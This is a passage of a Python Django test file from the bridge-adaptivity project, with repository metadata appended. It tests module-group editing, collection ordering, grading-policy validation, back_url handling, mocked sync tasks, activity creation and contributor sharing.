        response = self.client.post(url, data=self.group_update_data)
        if response.status_code == 200:
            # A 200 here means the form re-rendered with errors; dump them
            # to aid debugging before the assertions below fail.
            print((dict(response.context['form'].errors)))
        self.assertEqual(groups_count, ModuleGroup.objects.count())
        test_g = ModuleGroup.objects.get(id=self.test_cg.id)
        self.assertEqual(test_g.name, self.group_update_data['name'])
        self.assertEqual(test_g.description, self.group_update_data['description'])
        self.assertNotEqual(test_g.name, self.test_cg.name)
        self.assertNotEqual(test_g.description, self.test_cg.description)
        self.assertNotEqual(test_g.collections.all(), self.test_cg.collections.all())
class CollectionGroupEditGradingPolicyTest(BridgeTestCase):
    """Reusable assertion helpers for group-change/grading-policy tests.

    NOTE(review): this class defines no test_* methods itself; it only
    provides check_* helpers for subclasses or future tests.
    """
    def check_group_change_page(self):
        """Assert the group-change page renders with a form in context."""
        url = reverse('module:group-change', kwargs={'group_slug': self.test_cg.slug})
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
        self.assertIn('form', response.context)
    def check_update_group(self, data):
        """POST *data* to group-change and assert the group's name was updated."""
        url = reverse('module:group-change', kwargs={'group_slug': self.test_cg.slug})
        self.client.post(url, data=data)
        self.test_cg = ModuleGroup.objects.get(id=self.test_cg.id)
        self.assertEqual(self.group_update_data['name'], self.test_cg.name)
class TestCollectionGroupCollectionOrder(BridgeTestCase):
    """CollectionOrder add / update / delete / reorder flows within a group."""
    def test_group_collection_add(self):
        """
        Adding a new collection order increases the group's collection count by one.
        """
        data = {
            "collection_group-slug": "second",
            "collection_group-collection": self.collection2.id,
            "collection_group-engine": self.engine.id,
            "collection_group-grading_policy_name": "trials_count",
            "grading-name": "trials_count"
        }
        # Adding collection2 (not yet in the group) should grow the count by 1.
        expected_collections_count = self.test_cg.collections.count() + 1
        url = reverse('module:collection-order-add', kwargs={'group_slug': self.test_cg.slug})
        response = self.client.post(url, data=data)
        self.assertEqual(response.status_code, 202)
        self.assertEqual(self.test_cg.collections.count(), expected_collections_count)
    def test_group_collection_update(self):
        """
        Updating an existing collection order changes its grading policy.
        """
        data = {
            "collection_group-slug": self.collection_order1.slug,
            "collection_group-collection": self.collection1.id,
            "collection_group-engine": self.engine.id,
            "collection_group-grading_policy_name": "trials_count",
            "grading-name": "trials_count"
        }
        # collection_order1 was created with points_earned; switch it to trials_count.
        url = reverse('module:collection-order-change', kwargs={
            'collection_order_slug': self.collection_order1.slug,
        })
        response = self.client.post(url, data=data)
        self.assertEqual(response.status_code, 202)
        self.assertEqual(
            CollectionOrder.objects.get(id=self.collection_order1.id).grading_policy.name, "trials_count"
        )
    def test_group_collection_not_valid_update(self):
        """
        Updating with an unknown grading policy re-renders the form with errors.
        """
        data = {
            "collection_group-slug": self.collection_order1.slug,
            "collection_group-collection": self.collection1.id,
            "collection_group-engine": self.engine.id,
            "collection_group-grading_policy_name": "wrong_grading",
            "grading-name": "wrong_grading"
        }
        # "wrong_grading" is not a registered policy, so validation must fail.
        url = reverse('module:collection-order-change', kwargs={
            'collection_order_slug': self.collection_order1.slug
        })
        response = self.client.post(url, data=data)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(
            response.context['form'].errors,
            {
                'grading_policy_name': [
                    'Select a valid choice. wrong_grading is not one of the available choices.',
                    'Not correct policy'
                ]
            }
        )
    def test_cg_with_not_correct_policy_engine_pair(self):
        """
        Try to create collectiongroup with not correct pair of policy and engine.
        Not correct pair example - engine graded policy with mock engine.
        In this case it should return 200, and context['form'] should contain errors.
        """
        data = {
            "collection_group-slug": self.collection_order1.slug,
            "collection_group-collection": self.collection1.id,
            "collection_group-engine": self.engine.id,
            "collection_group-grading_policy_name": "engine_grade",
        }
        url = reverse('module:collection-order-change', kwargs={
            'collection_order_slug': self.collection_order1.slug
        })
        response = self.client.post(url, data=data)
        self.assertEqual(response.status_code, 200)
        self.assertIn('form', response.context)
        self.assertEqual(
            response.context['form'].errors,
            {
                'engine': ["This Engine doesn't support chosen Policy. Please choose another policy or engine."],
                'grading_policy_name': [('This policy can be used only with VPAL engine(s). '
                                         'Choose another policy or engine.')]
            }
        )
    def test_group_collection_remove(self):
        """
        Deleting a collection order removes it from the group's ordered collections.
        """
        data = [col_order for col_order, grade_update_available in self.test_cg.ordered_collections]
        expected_group_collection = len(data) - 1
        url = reverse(
            'module:collection-group-delete',
            kwargs={'collection_order_slug': self.collection_order1.slug}
        )
        response = self.client.post(url)
        # Successful deletion redirects (302) back to the group page.
        self.assertEqual(response.status_code, 302)
        self.assertEqual(len([x for x in self.test_cg.ordered_collections]), expected_group_collection)
    def test_group_collection_reordered(self):
        """
        Test collections are reordered in the group on move to different positions command.
        """
        data = {
            "collection_group-slug": "second",
            "collection_group-collection": self.collection2.id,
            "collection_group-engine": self.engine.id,
            "collection_group-grading_policy_name": "trials_count",
            "grading-name": "trials_count"
        }
        # Add a third collection order so there are three positions to permute.
        url = reverse('module:collection-order-add', kwargs={'group_slug': self.test_cg.slug})
        response = self.client.post(url, data=data)
        self.assertEqual(response.status_code, 202)
        ordered_collections = [col_order for col_order, grade_update_available in self.test_cg.ordered_collections]
        expected_collection_order = [ordered_collections[2], ordered_collections[1], ordered_collections[0]]
        # Moving collection3 up, collection1 down and get reordered result as (collection3, collection2, collection1)
        move_to_index_0 = reverse('module:collection-move', kwargs={
            'collection_order_slug': ordered_collections[2].slug,
            'order': 0,
        })
        response_up = self.client.get(move_to_index_0)
        self.assertEqual(response_up.status_code, 201)
        move_to_index_2 = reverse('module:collection-move', kwargs={
            'collection_order_slug': ordered_collections[0].slug,
            'order': 2,
        })
        response_down = self.client.get(move_to_index_2)
        self.assertEqual(response_down.status_code, 201)
        ordered_collections = [col_order for col_order, grade_update_available in self.test_cg.ordered_collections]
        self.assertEqual(ordered_collections, expected_collection_order)
    def test_get_grading_policy_form(self):
        """Test that form is present in response context for both grading policies."""
        policies = GRADING_POLICIES
        for policy, _ in policies:
            url = reverse('module:grading_policy_form', kwargs={
                "collection_order_slug": self.collection_order1.slug
            }) + "?grading_policy={}".format(policy)
            response = self.client.get(url)
            self.assertIn('form', response.context)
    def test_get_not_valid_grading_policy_form(self):
        """Check that if not correct grading policy passed - no form return."""
        url = reverse('module:grading_policy_form', kwargs={
            "collection_order_slug": self.collection_order1.slug
        }) + "?grading_policy={}".format('some_policy')
        response = self.client.get(url)
        self.assertNotIn('form', response.context)
class TestBackURLMixin(BridgeTestCase):
    """Checks that the ?back_url= query parameter is propagated into view context."""
    def setUp(self):
        super().setUp()
        self.back_url = '/test_back_url/'
    def test_collection_edit_back_url(self):
        """Test back_url param is added into context in collection change view."""
        url = (
            reverse('module:collection-change', kwargs={'slug': self.collection1.slug}) +
            '?back_url={}'.format(self.back_url)
        )
        change_response = self.client.get(url)
        self.assertIn('back_url', change_response.context)
        self.assertEqual(change_response.context['back_url'], self.back_url)
    @patch('module.views.get_available_courses', return_value=([], []))
    def test_collection_detail_back_url(self, available_course_mock):
        """Test back_url param is added into context navigation from collection detail view."""
        url_detail = (
            reverse('module:collection-detail', kwargs={'slug': self.collection1.slug}) +
            '?back_url={}'.format(self.back_url)
        )
        detail_response = self.client.get(url_detail)
        self.assertIn('back_url', detail_response.context)
        self.assertEqual(detail_response.context['back_url'], self.back_url)
    def test_collectiongroup_edit_back_url(self):
        """Test back_url param is added into context navigation from collectiongroup edit view."""
        change_url = (
            reverse('module:group-change', kwargs={'group_slug': self.test_cg.slug}) +
            '?back_url={}'.format(self.back_url)
        )
        change_response = self.client.get(change_url)
        self.assertIn('back_url', change_response.context)
        self.assertEqual(change_response.context['back_url'], self.back_url)
    def test_collectiongroup_detail_back_url(self):
        """Test back_url param is added into context navigation from collectiongroup detail view."""
        url = (
            reverse('module:group-detail', kwargs={'group_slug': self.test_cg.slug}) +
            '?back_url={}'.format(self.back_url)
        )
        detail_response = self.client.get(url)
        self.assertIn('back_url', detail_response.context)
        self.assertEqual(detail_response.context['back_url'], self.back_url)
class TestManualSync(BridgeTestCase):
    """Manual collection-engine synchronization endpoint."""
    @patch('module.tasks.sync_collection_engines.delay')
    @patch('module.tasks.sync_collection_engines.apply_async')
    @patch('module.views.get_available_courses', return_value=([], []))
    def test_immediate_synchronization(
        self, mock_get_available_courses, mock_apply_async, mock_delay
    ):
        """Hitting collection-sync schedules the sync task once and redirects to the detail page."""
        expected_url = reverse('module:collection-detail', kwargs={'slug': self.collection1.slug}) + '?back_url=None'
        url = reverse('module:collection-sync', kwargs={'slug': self.collection1.slug})
        response = self.client.get(url)
        mock_delay.assert_called_once_with(
            created_at=Collection.objects.get(slug=self.collection1.slug).updated_at,
            collection_slug=self.collection1.slug,
        )
        self.assertRedirects(response, expected_url)
    @patch('module.tasks.sync_collection_engines.delay')
    @patch('module.tasks.sync_collection_engines.apply_async')
    @patch('module.views.get_available_courses')
    def test_immediate_synchronization_incorrect_pk(
        self, mock_get_available_courses, mock_apply_async, mock_delay
    ):
        """An unknown collection slug yields 404."""
        col_slug = '345'
        url = reverse('module:collection-sync', kwargs={'slug': col_slug})
        response = self.client.get(url)
        self.assertEqual(response.status_code, 404)
class TestManualGradeUpdate(BridgeTestCase):
    """Manual student-grade recalculation endpoint."""
    @patch('module.tasks.update_students_grades.delay')
    def test_mandatory_students_grade_update(self, mock_delay):
        """update_grades schedules the grade task once and redirects to the group page."""
        expected_url = reverse('module:group-detail', kwargs={'group_slug': self.test_cg.slug}) + '?back_url=None'
        url = reverse('module:update_grades', kwargs={'collection_order_slug': self.collection_order1.slug})
        response = self.client.get(url)
        mock_delay.assert_called_once_with(collection_order_slug=self.collection_order1.slug)
        self.assertRedirects(response, expected_url)
    def test_grade_update_with_incorect_group_slug(self):
        """An unknown collection order slug yields 404."""
        url = reverse('module:update_grades', kwargs={'collection_order_slug': '3'})
        response = self.client.get(url)
        self.assertEqual(response.status_code, 404)
class TestCreateUpdateActivity(BridgeTestCase):
    """Create and update flows for Activity objects inside a collection."""
    fixtures = BridgeTestCase.fixtures + ['api.json', 'bridge.json']
    @patch('module.tasks.sync_collection_engines.apply_async')
    def setUp(self, mock_apply_async):
        super().setUp()
        self.back_url = reverse('module:collection-detail', kwargs={'slug': self.collection1.slug})
        self.provider = LtiContentSource.objects.get(id=2)
        self.add_url = reverse('module:activity-add', kwargs={'collection_slug': self.collection1.slug})
        # Valid POST payload for creating an Activity; reused (and partially
        # overridden) by the update test below.
        self.create_data = {
            'name': 'Adapt 310',
            'tags': '',
            'atype': 'G',
            'difficulty': '1',
            'source_launch_url': (
                'https://edx-staging-vpal.raccoongang.com/lti_lms_platform/courses/course-v1:MSFT+DAT222'
                'x+4T2017/block-v1:MSFT+DAT222x+4T2017+type@problem+block@306986fde3e2489db9c97462dca19d4b'),
            'source_name': 'Adapt 310',
            'stype': 'problem',
            'points': '0.5',
            'repetition': 1,
            'lti_content_source': self.provider.id,
        }
    @patch('module.tasks.sync_collection_engines.delay')
    @patch('module.tasks.sync_collection_engines.apply_async')
    @patch('module.views.get_available_courses')
    def test_create_activity(self, *mocks):
        """POSTing valid data creates exactly one new Activity."""
        activity_count = Activity.objects.count()
        response = self.client.post(self.add_url, self.create_data)
        if response.status_code == 200:
            # form errors
            print((response.context['form'].errors))
        self.assertEqual(activity_count + 1, Activity.objects.count())
    @patch('module.tasks.sync_collection_engines.delay')
    @patch('module.tasks.sync_collection_engines.apply_async')
    @patch('module.views.get_available_courses')
    def test_update_activity(self, *mocks):
        """Updating an activity changes its fields without creating a new one."""
        # create activity
        self.test_create_activity(*mocks)
        activity = Activity.objects.get()
        activity_count = Activity.objects.count()
        update_data = {
            'name': 'ADOPT 100500',
            'tags': 'some, tags, here',
            'stype': 'video'
        }
        data = self.create_data.copy()
        data.update(update_data)
        url = reverse('module:activity-change', kwargs={'pk': activity.id, 'collection_slug': self.collection1.slug})
        response = self.client.post(url, data)
        self.assertEqual(activity_count, Activity.objects.count())
        if response.status_code == 200:
            # form errors
            print((response.context['form'].errors))
        new_activity = Activity.objects.get()
        self.assertEqual(new_activity.name, update_data['name'])
        self.assertEqual(new_activity.tags, update_data['tags'])
        self.assertEqual(new_activity.stype, update_data['stype'])
class TestMultipleContentSources(BridgeTestCase):
    """Course aggregation across multiple (and deactivated) LTI content sources."""
    fixtures = BridgeTestCase.fixtures + ['api.json', 'bridge.json']
    @patch('module.tasks.sync_collection_engines.apply_async')
    def setUp(self, mock_apply_async):
        super().setUp()
    @patch('api.backends.edx_api_client.OpenEdxApiClient.get_oauth_access_token',
           return_value=('some_token', datetime.datetime.now() + datetime.timedelta(days=1)))
    @patch('api.backends.edx_api_client.OpenEdxApiClient.get_provider_courses',
           return_value=[{'name': 'name'} for _ in range(10)])
    @patch('api.backends.base_api_client.BaseApiClient.get_provider_courses',
           return_value=[{'name': 'name'} for _ in range(10)])
    def test_list_courses_multiple_sources(
        self,
        mock_base_get_provider_courses,
        mock_get_edx_provider_courses,
        mock_get_edx_oauth_access_token
    ):
        """
        Test count of courses from the multiple source.

        Each mocked provider contributes 10 courses; deactivating one
        provider must shrink the aggregated list by exactly 10.
        """
        url = reverse('module:collection-detail', kwargs={'slug': self.collection1.slug})
        response = self.client.get(url)
        self.assertIn('source_courses', response.context)
        self.assertTrue(response.context['source_courses'])
        total_courses = len(response.context['source_courses'])
        # we use 10 because mock function return list with size 10
        expect_course_count = LtiContentSource.objects.all().count() * 10
        self.assertEqual(total_courses, expect_course_count)
        provider = LtiContentSource.objects.all().first()
        provider.is_active = False
        provider.save()
        response = self.client.get(url)
        self.assertIn('source_courses', response.context)
        self.assertTrue(response.context['source_courses'])
        new_total_courses = len(response.context['source_courses'])
        self.assertNotEqual(new_total_courses, total_courses)
        # we use 10 because mock function return list with size 10
        self.assertEqual(new_total_courses, expect_course_count - 10)
class TestSharingModuleGroup(BridgeTestCase):
    """Covers granting and revoking contributor access on a shared ModuleGroup."""

    @patch('module.tasks.sync_collection_engines.apply_async')
    def setUp(self, mock_apply_async):
        super().setUp()
        self.contributor_1 = BridgeUser.objects.create_user(
            username='test_contributor_1',
            password='test_contributor_1',
            email='test_contributor_1@test.com'
        )
        self.contributor_2 = BridgeUser.objects.create_user(
            username='contributor_2',
            password='contributor_2',
            email='contributor_2@test.com'
        )
        self.test_cg = ModuleGroup.objects.create(
            name='TestColGroup',
            owner=self.user,
        )
        # contributor_1 starts out with access; contributor_2 does not.
        ContributorPermission.objects.create(user=self.contributor_1, group=self.test_cg)

    def test_add_contributor(self):
        """POSTing a username to the share URL grants that user contributor access."""
        share_url = reverse('module:group-share', kwargs={'group_slug': self.test_cg.slug})
        payload = {"contributor_username": self.contributor_2.username}
        response = self.client.post(share_url, payload)
        self.assertEqual(response.status_code, 200)
        self.assertTrue(
            self.test_cg.contributors.filter(username=self.contributor_2.username).exists()
        )

    def test_delete_contributor(self):
        """GETting the remove URL revokes access and redirects back to the group page."""
        remove_url = reverse(
            'module:group-share-remove',
            kwargs={'group_slug': self.test_cg.slug, 'username': self.contributor_1.username}
        )
        response = self.client.get(remove_url)
        self.assertRedirects(
            response,
            reverse('module:group-detail', kwargs={'group_slug': self.test_cg.slug})
        )
        self.assertFalse(
            self.test_cg.contributors.filter(username=self.contributor_1.username).exists()
        )
| {
"content_hash": "663fe6089620e75eed9ea51f5ed9eefb",
"timestamp": "",
"source": "github",
"line_count": 572,
"max_line_length": 117,
"avg_line_length": 44.57167832167832,
"alnum_prop": 0.6407138654638165,
"repo_name": "harvard-vpal/bridge-adaptivity",
"id": "64bf31ef0864dd09cdc945040d603d7b12a6cbc8",
"size": "25495",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bridge_adaptivity/module/tests/test_views.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "2514"
},
{
"name": "Dockerfile",
"bytes": "1586"
},
{
"name": "HTML",
"bytes": "70921"
},
{
"name": "JavaScript",
"bytes": "29636"
},
{
"name": "Makefile",
"bytes": "1614"
},
{
"name": "Python",
"bytes": "315506"
},
{
"name": "Shell",
"bytes": "242"
}
],
"symlink_target": ""
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.